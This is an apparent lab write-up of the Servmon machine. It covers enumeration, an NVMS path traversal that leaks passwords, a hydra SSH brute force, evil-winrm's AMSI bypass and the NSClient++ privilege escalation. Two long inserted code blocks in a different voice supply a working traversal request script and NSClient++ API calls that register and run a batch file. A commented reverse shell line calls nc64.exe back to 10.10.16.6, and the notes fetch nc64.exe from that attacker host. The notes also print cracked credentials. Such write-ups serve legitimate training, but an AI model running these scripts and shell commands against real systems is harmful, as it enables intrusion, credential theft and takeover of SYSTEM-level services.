Servmon
Personal Rating: Medium
Enumeration
sudo nmap -sV -sC -p- <IP>
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 06:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6063/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
| :Saturday
| workers
|_ jobs
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
That is a lot of output. It is clear that we have a Windows Server machine with an IIS-based website.
21 ftp:


So there is some secure folder in SharePoint for passwords.
80 http:


The directory traversal is very simple: /../../../../../../../../../../../../windows/win.ini, but it did not work.
feroxbuster -u http://10.10.10.184/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
# No results
8443 https:


feroxbuster -u https://10.10.10.184:8443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k
5666:
Likely NRPE (Nagios)
There are many Nagios exploits according to searchsploit. Maybe I can find out the version.
6699:
Possibly WinMX or napster
NVMS LFI
Possibly we can get the Passwords.txt file via the LFI that was mentioned in Confidential.txt, even though it did not work at first.
The Metasploit version of the exploit worked. But why?

This is what Metasploit sent. After testing the same in the browser I saw that something removed my payload from the URL ;_;
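The reason the browser test fails while the Metasploit module succeeds is that a browser normalises the URL path (RFC 3986 section 5.2.4 dot-segment removal) before the request leaves the machine, so every leading "../" is collapsed and the server only ever sees /windows/win.ini; Metasploit writes the path verbatim. The following is an added example, not code from the notes or from the Metasploit module: it shows what the browser turns the payload into, builds the request with the path untouched, and optionally sends it over a plain socket. The target IP and traversal path are the ones from the notes; the marker strings used to recognise win.ini and everything else are constructed for illustration.

```python
"""
Added example (not from the original notes or the Metasploit module):
why a traversal payload that works from Metasploit fails when typed into
a browser. The target and path are the ones from the notes; nothing is
sent unless send_raw() is called (e.g. by running this file directly).
"""
import socket
import ssl

TARGET = "10.10.10.184"
TRAVERSAL = "/../../../../../../../../../../../../windows/win.ini"


def remove_dot_segments(path: str) -> str:
    """RFC 3986 5.2.4 dot-segment removal, as a browser applies it to a URL path."""
    stack = []
    for seg in path.lstrip("/").split("/"):
        if seg == "..":
            if stack:
                stack.pop()          # "../" above the root is silently dropped
        elif seg != ".":
            stack.append(seg)
    return "/" + "/".join(stack)


def build_raw_request(host: str, path: str, port: int = 80) -> bytes:
    """Build an HTTP/1.1 GET with the path exactly as given (no normalisation)."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "User-Agent: raw-traversal-check\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def looks_like_win_ini(body: bytes) -> bool:
    """Sanity check: a real win.ini carries these markers, an error page does not."""
    return b"[fonts]" in body or b"for 16-bit app support" in body


def send_raw(host: str, path: str, port: int = 80, tls: bool = False,
             timeout: float = 5.0) -> bytes:
    """Send build_raw_request() over a plain socket and return the full response."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if tls:  # the 8443 listener uses a self-signed cert for 'localhost', so do not verify
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(build_raw_request(host, path, port))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    print("browser would send :", remove_dot_segments(TRAVERSAL))
    print("raw request sends  :",
          build_raw_request(TARGET, TRAVERSAL).split(b"\r\n")[0].decode())
    resp = send_raw(TARGET, TRAVERSAL)
    print("got win.ini?", looks_like_win_ini(resp))
```

From the shell, curl does the same thing as the browser unless told otherwise: curl --path-as-is 'http://10.10.10.184/../../../../../../../../../../../../windows/win.ini' keeps the dot segments, while plain curl squashes them just like the address bar did.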

The resulting file contained 7 passwords. I will try them all with nathan and nadine over SSH. Using hydra makes that faster:
hydra -L userlist.txt -P 20231211170419_default_10.10.10.184_nvms.traversal_767567.txt 10.10.10.184 ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-11 17:08:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:4/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: nadine password: L1k3B1gBut7s@W0rk
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 2 valid passwords found
Internal Enumeration
So I could log in with nadine. nadine has no special privileges:

I transferred winpeasx64.exe onto the host with a Python web server and wget in PowerShell and ran it.
It actually seems like Defender blocked WinPEAS:
Program 'winpeas.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software
Access to the command systeminfo is also denied.
Since evil-winrm has a built-in AMSI bypass, I will try that.
evil-winrm -i 10.10.10.184 -u nadine -p 'L1k3B1gBut7s@W0rk'
This did work. In "Program Files" you can see "Windows Defender Advanced Threat Protection".
This, which I found with searchsploit, might work: NSClient++ 0.5.2.35 - Privilege Escalation
According to the exploit entry, I can grab the password from C:\Program Files\NSClient++\nsclient.ini:
password = ew2x6SsGTxjRwXOT
This also worked: .\nscp.exe web password --display
Let's see if it works for SSH with root. Nope. Also not for Nathan.
With the Python version I get a 403, and with the Metasploit version I get that the admin password is wrong.
Privilege Escalation
Using scanner/ssh/ssh_login I could get a Metasploit session with nadine:L1k3B1gBut7s@W0rk
I was about to set up dynamic port forwarding to the host, but using netstat -ano I could see that I should be able to regularly access the application.
Watching IppSec's video since I was stuck here, I found out that the only reason why I could not properly use the website at port 8443 was that it only works with Chromium ;_;
So this exploit should now be possible: /usr/share/exploitdb/exploits/windows/local/46802.txt
ew2x6SsGTxjRwXOT
It did not work; the page shows a 403.
The Python version of the exploit did not work either:

With local port forwarding it worked, so it seems the application is only reachable from the host itself.
Now this one worked better, but I did not get a shell: windows/http/nscp_authenticated_rce
It looks like I have to do the exploit manually to make it work.
This one seems to work with SSH local port forwarding set up, but nc.exe did not work as the file seems corrupted.
python3 exploit.py 'cmd.exe /c "C:\Users\Nadine\Documents\evil.bat"' https://127.0.0.1:8443 ew2x6SsGTxjRwXOT

Another attempt:
wget http://10.10.16.6:8000/nc64.exe -UseBasicParsing -OutFile nc64.exe
Got it!
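The 403 versus "wrong password" confusion above comes down to two settings in nsclient.ini, and the chain itself comes down to two REST calls. The block below is an added example, not the notes' own code nor the exploit-db entry's: it parses the config for the web password, the source filter and the enabled modules, decides whether the attacker IP can talk to port 8443 directly or has to go through the ssh -L forward, and wraps the two API calls. Labelled assumptions: SAMPLE_INI is constructed to resemble a default nsclient.ini and only the password value comes from the notes; "allowed hosts = 127.0.0.1" is the usual cause of a 403 from a remote client even with the right password (which is consistent with the forward fixing it) but is the thing to verify on the box, not a fact the notes establish; the endpoints PUT /api/v1/scripts/ext/scripts/<file> and GET /api/v1/queries/<name>/commands/execute with the password in a "password" header are the NSClient++ 0.5.2 REST API as I know it, and the command name "evil" for a registered "evil.bat" should be confirmed against GET /api/v1/queries before relying on it; the listener port 4444 is arbitrary.

```python
"""
Added example (not the notes' code nor the exploit-db entry's): config checks
and API calls for the NSClient++ 0.5.2.35 privilege escalation. External
scripts run under the NSClient++ service account, which is the whole point.
Assumptions are marked in comments; SAMPLE_INI is constructed.
"""
import configparser
import ipaddress
import ssl
import urllib.request

SAMPLE_INI = """\
; CONSTRUCTED sample modelled on a default nsclient.ini; only the password
; value is taken from the notes (real file: C:\\Program Files\\NSClient++\\nsclient.ini)
[/modules]
CheckExternalScripts = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = ew2x6SsGTxjRwXOT
"""


def parse_nsclient_ini(text: str) -> dict:
    """Pull out what the privesc needs: web password, source filter, enabled modules."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    default = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    modules = cp["/modules"] if cp.has_section("/modules") else {}
    allowed = [h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()]
    return {
        "password": default.get("password"),
        "allowed_hosts": allowed,
        # configparser lowercases option names, so WEBServer becomes webserver
        "web_enabled": modules.get("webserver", "").lower() == "enabled",
        "external_scripts": modules.get("checkexternalscripts", "").lower() == "enabled",
    }


def client_is_allowed(client_ip: str, allowed_hosts: list) -> bool:
    """True if client_ip matches an IP or CIDR entry; an empty list means no source filter."""
    if not allowed_hosts:
        return True
    ip = ipaddress.ip_address(client_ip)
    for entry in allowed_hosts:
        try:
            net = ipaddress.ip_network(entry, strict=False)
        except ValueError:
            continue  # hostname entries would need DNS; ignored in this offline check
        if ip in net:
            return True
    return False


def choose_base_url(cfg: dict, attacker_ip: str, target_ip: str, port: int = 8443) -> str:
    """Hit the service directly if allowed, otherwise go through a local forward
    (ssh -L 8443:127.0.0.1:8443 nadine@<target>) so the source appears as 127.0.0.1."""
    if client_is_allowed(attacker_ip, cfg["allowed_hosts"]):
        return f"https://{target_ip}:{port}"
    return f"https://127.0.0.1:{port}"


def _opener() -> urllib.request.OpenerDirector:
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # self-signed cert for 'localhost', expired per nmap
    return urllib.request.build_opener(urllib.request.HTTPSHandler(context=ctx))


def register_script(base_url: str, password: str, script_file: str, body: str) -> int:
    """PUT the script body; NSClient++ stores it under scripts/ and registers a command.
    Endpoint and 'password' header are assumed from the 0.5.2 REST API."""
    req = urllib.request.Request(
        f"{base_url}/api/v1/scripts/ext/scripts/{script_file}",
        data=body.encode(), method="PUT", headers={"password": password})
    with _opener().open(req) as resp:
        return resp.status


def execute_command(base_url: str, password: str, command_name: str) -> str:
    """Run the registered command (assumed: file name without extension) and return the body."""
    req = urllib.request.Request(
        f"{base_url}/api/v1/queries/{command_name}/commands/execute",
        headers={"password": password})
    with _opener().open(req) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    cfg = parse_nsclient_ini(SAMPLE_INI)
    base = choose_base_url(cfg, "10.10.16.6", "10.10.10.184")
    print(cfg)
    print("talk to NSClient++ via:", base)
    # With the forward up, the chain is (port 4444 is an arbitrary listener):
    # register_script(base, cfg["password"], "evil.bat",
    #                 r"C:\Users\Nadine\Documents\nc64.exe 10.10.16.6 4444 -e cmd.exe")
    # execute_command(base, cfg["password"], "evil")
```

Before running the two API calls, check the enabled modules: without CheckExternalScripts the registered script has nothing to execute it, and without WEBServer there is no API at all. The web password is what .\nscp.exe web password --display prints on the box, so the parser result should match that output.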
